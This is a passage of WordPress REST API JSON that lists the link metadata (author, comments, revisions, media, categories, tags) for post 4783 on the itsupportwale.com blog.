upportwale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href
":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/comments?post=4783"}],"version-history":[{"count":0,"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/posts\/4783\/revisions"}],"wp:attachment":[{"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/media?parent=4783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/categories?post=4783"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/itsupportwale.com\/blog\/wp-json\/wp\/v2\/tags?post=4783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}